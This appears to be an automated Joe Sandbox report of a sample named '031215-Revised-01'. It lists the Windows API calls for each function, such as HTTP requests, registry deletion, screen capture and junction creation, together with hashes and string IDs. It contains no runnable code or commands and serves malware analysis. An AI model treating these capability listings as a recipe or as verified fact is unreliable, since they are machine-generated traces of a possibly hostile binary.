                                        • Opcode ID: 4fcce91a951e96dd84afaec7fb4c9dda3a992efe36ba0b3ea50d80daca863692
                                        • Instruction ID: 3cb857d5be420f6ed5a8071bc75c09802669b9f0a84a18e3041b4a91d51bdc56
                                        • Opcode Fuzzy Hash: 4fcce91a951e96dd84afaec7fb4c9dda3a992efe36ba0b3ea50d80daca863692
                                        • Instruction Fuzzy Hash: 9271C670640206BAFB359F65CC49FEABFA4FF05364F204226F528661E1C7B1AD50DB94
                                        APIs
                                        • DestroyWindow.USER32(?,?), ref: 00106DEB
                                          • Part of subcall function 00076B57: _wcslen.LIBCMT ref: 00076B6A
                                        • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00106E5F
                                        • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00106E81
                                        • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00106E94
                                        • DestroyWindow.USER32(?), ref: 00106EB5
                                        • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00070000,00000000), ref: 00106EE4
                                        • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00106EFD
                                        • GetDesktopWindow.USER32 ref: 00106F16
                                        • GetWindowRect.USER32(00000000), ref: 00106F1D
                                        • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00106F35
                                        • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00106F4D
                                          • Part of subcall function 00089944: GetWindowLongW.USER32(?,000000EB), ref: 00089952
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                         • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_wcslen
                                        • String ID: 0$tooltips_class32
                                        • API String ID: 2429346358-3619404913
                                        • Opcode ID: 4f89a94bf055b807eadae66958cf87a777e1bb002d496c68c7e1a0e0524bf9b6
                                        • Instruction ID: e252b44b384dbfa63fb4561827312df801fe1d4af4764a0cad31c2b44bd234aa
                                        • Opcode Fuzzy Hash: 4f89a94bf055b807eadae66958cf87a777e1bb002d496c68c7e1a0e0524bf9b6
                                        • Instruction Fuzzy Hash: 99717674104345AFDB21CF18DC54EAABBE9FB89304F04091DFAC9872A1CBB1A996CF51
                                        APIs
                                          • Part of subcall function 00089BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00089BB2
                                        • DragQueryPoint.SHELL32(?,?), ref: 00109147
                                          • Part of subcall function 00107674: ClientToScreen.USER32(?,?), ref: 0010769A
                                          • Part of subcall function 00107674: GetWindowRect.USER32(?,?), ref: 00107710
                                          • Part of subcall function 00107674: PtInRect.USER32(?,?,00108B89), ref: 00107720
                                        • SendMessageW.USER32(?,000000B0,?,?), ref: 001091B0
                                        • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 001091BB
                                        • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 001091DE
                                        • SendMessageW.USER32(?,000000C2,00000001,?), ref: 00109225
                                        • SendMessageW.USER32(?,000000B0,?,?), ref: 0010923E
                                        • SendMessageW.USER32(?,000000B1,?,?), ref: 00109255
                                        • SendMessageW.USER32(?,000000B1,?,?), ref: 00109277
                                        • DragFinish.SHELL32(?), ref: 0010927E
                                        • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 00109371
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                         • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen
                                        • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                        • API String ID: 221274066-3440237614
                                        • Opcode ID: 0521f3ac5cb80ec55be09ce7cfdc23f362b98499109d2f535d57de57baea1e42
                                        • Instruction ID: 28153b7a1b3ab18eaab7e49bb6fd5cf236542a5b48930d727ff89e8d4f0f9379
                                        • Opcode Fuzzy Hash: 0521f3ac5cb80ec55be09ce7cfdc23f362b98499109d2f535d57de57baea1e42
                                        • Instruction Fuzzy Hash: AE616971508301AFD701EF64DC85DAFBBE8FF99350F004A2DF595921A2DB709A89CB92
                                        APIs
                                        • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 000EC4B0
                                        • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 000EC4C3
                                        • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 000EC4D7
                                        • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 000EC4F0
                                        • InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 000EC533
                                        • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 000EC549
                                        • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 000EC554
                                        • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 000EC584
                                        • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 000EC5DC
                                        • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 000EC5F0
                                        • InternetCloseHandle.WININET(00000000), ref: 000EC5FB
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                         • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: Internet$Http$ErrorEventLastOptionQueryRequest$CloseConnectHandleInfoOpenSend
                                        • String ID:
                                        • API String ID: 3800310941-3916222277
                                        • Opcode ID: acb84e1d62fd654c2b8743052b01c1f13d7333d05768082df41076b06aac9bf7
                                        • Instruction ID: ba603617c39ff26e2e9875cfd1df745c258d6284825855d0d05b22af96c5ee60
                                        • Opcode Fuzzy Hash: acb84e1d62fd654c2b8743052b01c1f13d7333d05768082df41076b06aac9bf7
                                        • Instruction Fuzzy Hash: CC517FB1500744BFEB219F65C948EAB7BFCFF04344F00451AF986A6650D771E9859FA0
                                        APIs
                                        • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,00000000,?), ref: 00108592
                                        • GetFileSize.KERNEL32(00000000,00000000), ref: 001085A2
                                        • GlobalAlloc.KERNEL32(00000002,00000000), ref: 001085AD
                                        • CloseHandle.KERNEL32(00000000), ref: 001085BA
                                        • GlobalLock.KERNEL32(00000000), ref: 001085C8
                                        • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 001085D7
                                        • GlobalUnlock.KERNEL32(00000000), ref: 001085E0
                                        • CloseHandle.KERNEL32(00000000), ref: 001085E7
                                        • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 001085F8
                                        • OleLoadPicture.OLEAUT32(?,00000000,00000000,0010FC38,?), ref: 00108611
                                        • GlobalFree.KERNEL32(00000000), ref: 00108621
                                        • GetObjectW.GDI32(?,00000018,000000FF), ref: 00108641
                                        • CopyImage.USER32(?,00000000,00000000,?,00002000), ref: 00108671
                                        • DeleteObject.GDI32(00000000), ref: 00108699
                                        • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 001086AF
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                         • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                        • String ID:
                                        • API String ID: 3840717409-0
                                        • Opcode ID: eaa2ff5a8ab05004ac69e5c9ef89a6306b8b88fc2878adbb13dcd4914b28fa21
                                        • Instruction ID: 75eeec3f55ae4520cb92a99c28b5097ef8bfbbb2589939d4a17363f3e0cd99f4
                                        • Opcode Fuzzy Hash: eaa2ff5a8ab05004ac69e5c9ef89a6306b8b88fc2878adbb13dcd4914b28fa21
                                        • Instruction Fuzzy Hash: 09412C75600208EFDB119F65CC48EAA7BB8FF89711F108258F985D7690DBB19941CF60
                                        APIs
                                        • VariantInit.OLEAUT32(00000000), ref: 000E1502
                                        • VariantCopy.OLEAUT32(?,?), ref: 000E150B
                                        • VariantClear.OLEAUT32(?), ref: 000E1517
                                        • VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 000E15FB
                                        • VarR8FromDec.OLEAUT32(?,?), ref: 000E1657
                                        • VariantInit.OLEAUT32(?), ref: 000E1708
                                        • SysFreeString.OLEAUT32(?), ref: 000E178C
                                        • VariantClear.OLEAUT32(?), ref: 000E17D8
                                        • VariantClear.OLEAUT32(?), ref: 000E17E7
                                        • VariantInit.OLEAUT32(00000000), ref: 000E1823
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                         • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem
                                        • String ID: %4d%02d%02d%02d%02d%02d$Default
                                        • API String ID: 1234038744-3931177956
                                        • Opcode ID: 21946620e932b99792419713b4085b6fe2884527261de9a983de00c091c786d7
                                        • Instruction ID: 7b78a089c1987fc421eb71766ca22a38295be4054c2c8ae89bfe5236b083eaa5
                                        • Opcode Fuzzy Hash: 21946620e932b99792419713b4085b6fe2884527261de9a983de00c091c786d7
                                        • Instruction Fuzzy Hash: FCD10032A00A01EFDB20AF66D885BFDB7B1BF45700F10815AE896BB585DB74DC40DBA1
                                        APIs
                                          • Part of subcall function 00079CB3: _wcslen.LIBCMT ref: 00079CBD
                                          • Part of subcall function 000FC998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,000FB6AE,?,?), ref: 000FC9B5
                                          • Part of subcall function 000FC998: _wcslen.LIBCMT ref: 000FC9F1
                                          • Part of subcall function 000FC998: _wcslen.LIBCMT ref: 000FCA68
                                          • Part of subcall function 000FC998: _wcslen.LIBCMT ref: 000FCA9E
                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 000FB6F4
                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 000FB772
                                        • RegDeleteValueW.ADVAPI32(?,?), ref: 000FB80A
                                        • RegCloseKey.ADVAPI32(?), ref: 000FB87E
                                        • RegCloseKey.ADVAPI32(?), ref: 000FB89C
                                        • LoadLibraryA.KERNEL32(advapi32.dll), ref: 000FB8F2
                                        • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 000FB904
                                        • RegDeleteKeyW.ADVAPI32(?,?), ref: 000FB922
                                        • FreeLibrary.KERNEL32(00000000), ref: 000FB983
                                        • RegCloseKey.ADVAPI32(00000000), ref: 000FB994
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                         • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: _wcslen$Close$DeleteLibrary$AddressBuffCharConnectFreeLoadOpenProcRegistryUpperValue
                                        • String ID: RegDeleteKeyExW$advapi32.dll
                                        • API String ID: 146587525-4033151799
                                        • Opcode ID: b3a4d94b9c461a6cd98d92a2985f5ba033e52f1d5112c3eff961de7f91f2f87f
                                        • Instruction ID: 6a55c4d3955c1dc7fe392adfd76dcd5a9eff12e01e8b6a570759d34f0aed62c6
                                        • Opcode Fuzzy Hash: b3a4d94b9c461a6cd98d92a2985f5ba033e52f1d5112c3eff961de7f91f2f87f
                                        • Instruction Fuzzy Hash: 78C19C34608205AFD720DF24C495F6ABBE1BF84308F14855CF69A8BAA2CB75EC45DF91
                                        APIs
                                        • GetDC.USER32(00000000), ref: 000F25D8
                                        • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 000F25E8
                                        • CreateCompatibleDC.GDI32(?), ref: 000F25F4
                                        • SelectObject.GDI32(00000000,?), ref: 000F2601
                                        • StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000006,?,?,?,00CC0020), ref: 000F266D
                                        • GetDIBits.GDI32(?,?,00000000,00000000,00000000,00000028,00000000), ref: 000F26AC
                                        • GetDIBits.GDI32(?,?,00000000,?,00000000,00000028,00000000), ref: 000F26D0
                                        • SelectObject.GDI32(?,?), ref: 000F26D8
                                        • DeleteObject.GDI32(?), ref: 000F26E1
                                        • DeleteDC.GDI32(?), ref: 000F26E8
                                        • ReleaseDC.USER32(00000000,?), ref: 000F26F3
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                         • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                        • String ID: (
                                        • API String ID: 2598888154-3887548279
                                        • Opcode ID: a53526c95f7789f48fec6a79a23ae83eaf7143e80eecc9b47404bd72c248e360
                                        • Instruction ID: 31ce0d923cef2e3ab2b88ba3cfed6bf7ea408966761c686f2e0c16d325890204
                                        • Opcode Fuzzy Hash: a53526c95f7789f48fec6a79a23ae83eaf7143e80eecc9b47404bd72c248e360
                                        • Instruction Fuzzy Hash: B06102B5D00219EFCF14CFA4D884AAEBBF6FF48310F208529EA55A7650D770A951DF90
                                        APIs
                                        • ___free_lconv_mon.LIBCMT ref: 000ADAA1
                                          • Part of subcall function 000AD63C: _free.LIBCMT ref: 000AD659
                                          • Part of subcall function 000AD63C: _free.LIBCMT ref: 000AD66B
                                          • Part of subcall function 000AD63C: _free.LIBCMT ref: 000AD67D
                                          • Part of subcall function 000AD63C: _free.LIBCMT ref: 000AD68F
                                          • Part of subcall function 000AD63C: _free.LIBCMT ref: 000AD6A1
                                          • Part of subcall function 000AD63C: _free.LIBCMT ref: 000AD6B3
                                          • Part of subcall function 000AD63C: _free.LIBCMT ref: 000AD6C5
                                          • Part of subcall function 000AD63C: _free.LIBCMT ref: 000AD6D7
                                          • Part of subcall function 000AD63C: _free.LIBCMT ref: 000AD6E9
                                          • Part of subcall function 000AD63C: _free.LIBCMT ref: 000AD6FB
                                          • Part of subcall function 000AD63C: _free.LIBCMT ref: 000AD70D
                                          • Part of subcall function 000AD63C: _free.LIBCMT ref: 000AD71F
                                          • Part of subcall function 000AD63C: _free.LIBCMT ref: 000AD731
                                        • _free.LIBCMT ref: 000ADA96
                                          • Part of subcall function 000A29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,000AD7D1,00000000,00000000,00000000,00000000,?,000AD7F8,00000000,00000007,00000000,?,000ADBF5,00000000), ref: 000A29DE
                                          • Part of subcall function 000A29C8: GetLastError.KERNEL32(00000000,?,000AD7D1,00000000,00000000,00000000,00000000,?,000AD7F8,00000000,00000007,00000000,?,000ADBF5,00000000,00000000), ref: 000A29F0
                                        • _free.LIBCMT ref: 000ADAB8
                                        • _free.LIBCMT ref: 000ADACD
                                        • _free.LIBCMT ref: 000ADAD8
                                        • _free.LIBCMT ref: 000ADAFA
                                        • _free.LIBCMT ref: 000ADB0D
                                        • _free.LIBCMT ref: 000ADB1B
                                        • _free.LIBCMT ref: 000ADB26
                                        • _free.LIBCMT ref: 000ADB5E
                                        • _free.LIBCMT ref: 000ADB65
                                        • _free.LIBCMT ref: 000ADB82
                                        • _free.LIBCMT ref: 000ADB9A
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                         • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                        • String ID:
                                        • API String ID: 161543041-0
                                        • Opcode ID: a93b49ed7fdb22b6442123f1a4e816c2efb2c3416dd2d62dee6f1774c0eda38d
                                        • Instruction ID: a2972d7d8d52c0e81ca37d66821779db154bd7275fa500c31a2c5cc2f899a292
                                        • Opcode Fuzzy Hash: a93b49ed7fdb22b6442123f1a4e816c2efb2c3416dd2d62dee6f1774c0eda38d
                                        • Instruction Fuzzy Hash: 27318D31604305DFEBA1AAB8E845B9B77E9FF12710F11442AE44AD7992DF30EC40C721
                                        APIs
                                        • GetClassNameW.USER32(?,?,00000100), ref: 000D369C
                                        • _wcslen.LIBCMT ref: 000D36A7
                                        • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 000D3797
                                        • GetClassNameW.USER32(?,?,00000400), ref: 000D380C
                                        • GetDlgCtrlID.USER32(?), ref: 000D385D
                                        • GetWindowRect.USER32(?,?), ref: 000D3882
                                        • GetParent.USER32(?), ref: 000D38A0
                                        • ScreenToClient.USER32(00000000), ref: 000D38A7
                                        • GetClassNameW.USER32(?,?,00000100), ref: 000D3921
                                        • GetWindowTextW.USER32(?,?,00000400), ref: 000D395D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                         • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout_wcslen
                                        • String ID: %s%u
                                        • API String ID: 4010501982-679674701
                                        • Opcode ID: 13d54367c1040396006f3ccead2d0447fb90a9d8dfbf52a0d4abef09e70f0768
                                        • Instruction ID: 5fffdb5cd6c5d9ea8c66a00763f844393862ff62e2b5c706e2023ec3a384102d
                                        • Opcode Fuzzy Hash: 13d54367c1040396006f3ccead2d0447fb90a9d8dfbf52a0d4abef09e70f0768
                                        • Instruction Fuzzy Hash: 5691A571204706AFD715DF24C895BEAF7E8FF44350F00862AF999D2291DB70EA45CBA2
                                        APIs
                                        • GetClassNameW.USER32(?,?,00000400), ref: 000D4994
                                        • GetWindowTextW.USER32(?,?,00000400), ref: 000D49DA
                                        • _wcslen.LIBCMT ref: 000D49EB
                                        • CharUpperBuffW.USER32(?,00000000), ref: 000D49F7
                                        • _wcsstr.LIBVCRUNTIME ref: 000D4A2C
                                        • GetClassNameW.USER32(00000018,?,00000400), ref: 000D4A64
                                        • GetWindowTextW.USER32(?,?,00000400), ref: 000D4A9D
                                        • GetClassNameW.USER32(00000018,?,00000400), ref: 000D4AE6
                                        • GetClassNameW.USER32(?,?,00000400), ref: 000D4B20
                                        • GetWindowRect.USER32(?,?), ref: 000D4B8B
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: ClassName$Window$Text$BuffCharRectUpper_wcslen_wcsstr
                                        • String ID: ThumbnailClass
                                        • API String ID: 1311036022-1241985126
                                        • Opcode ID: 91b3b4ab6096e702d6978c0bd0d8e515f5d39c37e2e8afa369b48e3ff06876c2
                                        • Instruction ID: e28f677b81c672e01876db0582422732431397ddeb7b0e5618076ee07c750607
                                        • Opcode Fuzzy Hash: 91b3b4ab6096e702d6978c0bd0d8e515f5d39c37e2e8afa369b48e3ff06876c2
                                        • Instruction Fuzzy Hash: 8991B8710083059BDB14CF14C985BAAB7E8FF94314F04856BFD899A296EB34ED45CBA2
                                        APIs
                                        • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 000FCC64
                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?,00000000), ref: 000FCC8D
                                        • FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 000FCD48
                                          • Part of subcall function 000FCC34: RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 000FCCAA
                                          • Part of subcall function 000FCC34: LoadLibraryA.KERNEL32(advapi32.dll,?,?,00000000), ref: 000FCCBD
                                          • Part of subcall function 000FCC34: GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 000FCCCF
                                          • Part of subcall function 000FCC34: FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 000FCD05
                                          • Part of subcall function 000FCC34: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 000FCD28
                                        • RegDeleteKeyW.ADVAPI32(?,?), ref: 000FCCF3
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: Library$EnumFree$AddressCloseDeleteLoadOpenProc
                                        • String ID: RegDeleteKeyExW$advapi32.dll
                                        • API String ID: 2734957052-4033151799
                                        • Opcode ID: 7c9a809956feac5f53188d8153415e8a90f64ab0d8c37bc938453f02f5146647
                                        • Instruction ID: 774156045852e7de9b22aae73855da2ac4336becdba056edbebcf5ab658f7856
                                        • Opcode Fuzzy Hash: 7c9a809956feac5f53188d8153415e8a90f64ab0d8c37bc938453f02f5146647
                                        • Instruction Fuzzy Hash: D1318F7590112CBBEB208B54DD89EFFBBBCEF45750F000165FA06E2644DB709A85EAE0
                                        APIs
                                        • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 000E3D40
                                        • _wcslen.LIBCMT ref: 000E3D6D
                                        • CreateDirectoryW.KERNEL32(?,00000000), ref: 000E3D9D
                                        • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 000E3DBE
                                        • RemoveDirectoryW.KERNEL32(?), ref: 000E3DCE
                                        • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 000E3E55
                                        • CloseHandle.KERNEL32(00000000), ref: 000E3E60
                                        • CloseHandle.KERNEL32(00000000), ref: 000E3E6B
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove_wcslen
                                        • String ID: :$\$\??\%s
                                        • API String ID: 1149970189-3457252023
                                        • Opcode ID: 861cee8fdbb657d67347a7945d7642703aeae1cd4f4e82aa5b126147e73b7dd8
                                        • Instruction ID: 7739c5b70534162998b1de70f292b9ec76c1d8b3a4b54cfda7fa72f0f721bf94
                                        • Opcode Fuzzy Hash: 861cee8fdbb657d67347a7945d7642703aeae1cd4f4e82aa5b126147e73b7dd8
                                        • Instruction Fuzzy Hash: F631B271904249ABDB219BA1DC49FEF3BBDEF88700F5041B5F545E6061EBB097848B64
                                        APIs
                                        • timeGetTime.WINMM ref: 000DE6B4
                                          • Part of subcall function 0008E551: timeGetTime.WINMM(?,?,000DE6D4), ref: 0008E555
